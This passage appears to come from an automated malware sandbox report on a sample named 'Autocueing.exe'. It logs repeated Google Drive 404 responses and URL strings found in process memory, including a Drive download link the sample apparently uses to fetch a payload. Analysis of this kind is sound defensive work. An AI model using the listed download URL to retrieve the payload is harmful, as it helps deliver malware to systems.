Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQzs32MxJrFS3F9gKWhpEUGzMuNjqOp9QTTGw8MEZswz0d0bRirdZTbkDlf3ppvvASn8lzoGzIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:58 GMTContent-Security-Policy: script-src 'nonce-Pa1J2QkUsDZKUOWdYX-70w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTGxi-imLV30YR0MPMeeWzNJqky7yS09xqzaOM3-4fIMSJl52zbbsWtvNePzBB1lMg3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-QW5DyroVhUhgbrgA_sTTwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WnCNcuhRYqGsGQpBrAZ0JQAssf2gN7F90zv_2JFB8_mYHudLBwwahGTNhCDIw6_0HnD1EddoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:03 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-hCCoLovpycFQS0Jk5VH8uQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT72STby2HpL8BfreZE_9hFyCve7O0nTXiHOd2kBVSE9AQa4NlO3iv_SrEacfmd4Z6xContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:06 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VgnnsdqBP72rJbq2pd_sfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTA7uK8NWEqkwmM9uFlVuFGAsg1auwHDoQxzWHYZYoWAYhf6XGYR-3RzBWJmtqQu-olContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:08 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Zn9Jjjap9ICX0aRIC6El9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTEoM0Zwsy96yCugUnNJBzM1_93b667AySGCPw-K_b46LDOJjRqw465ETxjN2Y4uEyMvJZ0B3YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:10 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-eMts4lZsweDBfob4_ZZZcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSG5Bk7FTZ75QWEBZELc6PAOLgrTzaxhHGFUHVdiMc_xsWtotTyXJVK-EHq7r9bcReU7dxotPgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-MKNts7zkqtLaJ_EuFWQjTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTCGPqfiCIfF7E4_Y11Zlpi8lHpDbTMaEzto-slDSb-3GjKD6gQan4_sQ8i1GkxpTNaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:15 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-60rpNSTb_L5yiR1PBmRv2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR7bc2rGpMLGCJvCHpFRm5Gr70P50kJy7IVTs3cJJDbuHvRpXoBoefuvhhteLsfhrTrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:17 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-p8pc-WhDtEl5hMlh9Ti1nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS9uOp4jWQ7uYNhw9vvz_CS4awMW3BGnAe5msnLrANXk5Ljgp5buQXc7YPILmZfSI-fuZW0DWkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:19 GMTContent-Security-Policy: script-src 'nonce-wHf_og30dQpb5FZl9Q3hLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000002.00000002.2522268759.00000000073D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
      Source: av8XPPpdBc.exe, Autocueing.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Autocueing.exe, 00000008.00000001.2515081160.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Autocueing.exe, 00000008.00000001.2515081160.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: Autocueing.exe, 00000008.00000003.2818652713.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830392198.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2807502371.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com%Ur
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/(
      Source: Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/0
      Source: Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/1005E9DC5D8267227684D07A38
      Source: Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/4C7797FE41F2A87CA6B2734C43
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7
      Source: Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3136123204.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
